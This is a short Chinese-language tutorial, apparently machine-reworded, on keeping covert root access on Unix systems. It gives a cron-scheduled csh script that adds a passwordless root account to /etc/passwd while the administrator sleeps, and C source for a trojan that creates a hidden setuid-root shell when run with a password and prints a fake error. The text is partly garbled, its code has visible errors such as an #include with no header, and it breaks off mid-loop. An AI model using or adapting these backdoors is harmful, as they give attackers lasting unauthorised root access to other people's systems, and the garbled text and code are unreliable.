Crontab 程序针对网站管理员而言是十分有用的。Cron 服务项目用以方案程序在指定時间(月、日、周、时、分)运行。假如你充足聪慧,就需要进行运用,使之为大家生产制造“侧门”!根据 Cron 服务项目,你能让它在每日零晨 2:00 (这个时候网管应当睡着了吧。)运行侧门程序,使你可以随便进到系统软件干你想几件事,并在网管起來以前撤出系统软件。根客户的 crontab 文档放到 /var/spool/crontab/root 中,其文件格式如下所示:
(1) (2) (3) (4) (5) (6)
0 0 * * 3 /usr/bin/updatedb
1. 分鐘 (0-60)
2. 钟头 (0-23)
3. 日 (1-31)
4. 月 (1-12)
5. 礼拜 (1-7)
6. 所要运行的程序
以上内容设定该程序于每星期三 0:0 运行。要在 cron 创建侧门,只需在 /var/spool/crontab/root 中加上侧门程序就可以。例如该程序可以在每日查验我们在 /etc/passwd 文档中提高了客户账号是不是依然合理。下列是程序示例:
0 0 * * * /usr/bin/retract
backdoor/backdoor.sh
#!/bin/csh
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then
set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] = 1
split -$linecount[1] ./temppass
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
echo Done...
else
endif
[综合性]
自然,我们可以撰写木马病毒程序,并把它放进 /bin 文件目录下。当以特殊命令行参数运行时将出现一个 suid shell。下列是程序示例:
backdoor/backdoor3.c
#include
#define pass "triad"
#define BUFFERSIZE 6
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
system("cp /bin/csh /bin/.swp121");
system("chmod 4755 /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
printf("372f: Invalid control argument, unable to initialize. Retrying");
for(;i